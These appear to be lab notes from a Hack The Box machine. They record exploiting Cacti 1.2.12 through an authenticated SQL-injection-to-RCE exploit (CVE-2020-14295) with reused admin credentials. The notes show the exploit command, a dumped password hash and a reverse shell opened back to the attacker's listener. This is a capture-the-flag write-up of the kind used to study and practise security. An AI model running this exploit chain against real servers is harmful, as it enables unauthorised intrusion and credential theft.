5 cacti-admin.monitors.htb

http://cacti-admin.monitors.htb > http://cacti-admin.monitors.htb/cacti/index.php
Cacti Login Page
| v 1.2.12

# found authenticated RCE 
| https://www.exploit-db.com/exploits/49810
| https://github.com/0z09e/CVE-2020-14295

# trying existing creds
admin:BestAdministrator@2020! works

Using https://www.exploit-db.com/exploits/49810
| changed /bin/sh to /bin/bash

$ python3 49810.py -t http://cacti-admin.monitors.htb -u admin -p 'BestAdministrator@2020!' --lhost 10.10.16.7 --lport 6969
[+] Connecting to the server...
[+] Retrieving CSRF token...
[+] Got CSRF token: sid:c33f8f034803482004d2a1c356af7b555b7eab86,1633463987
[+] Trying to log in...
[+] Successfully logged in!

[+] SQL Injection:
"name","hex"
"",""
"admin","$2y$10$TycpbAes3hYvzsbRxUEbc.dTqT0MdgVipJNBYu8b7rUlmB8zn8JwK"
"guest","43e9a4ab75570f5b"

[+] Check your nc listener!

$ nc -lvnp 6969
listening on [any] 6969 ...
connect to [10.10.16.7] from (UNKNOWN) [10.10.10.238] 59396
bash: cannot set terminal process group (1510): Inappropriate ioctl for device
bash: no job control in this shell
www-data@monitors:/usr/share/cacti/cacti$ whoami;id;hostname;uname -a
whoami;id;hostname;uname -a
www-data
uid=33(www-data) gid=33(www-data) groups=33(www-data)
monitors
Linux monitors 4.15.0-151-generic #157-Ubuntu SMP Fri Jul 9 23:07:57 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux

# note: we know admin pass for cacti so no cracking needed.

Last updated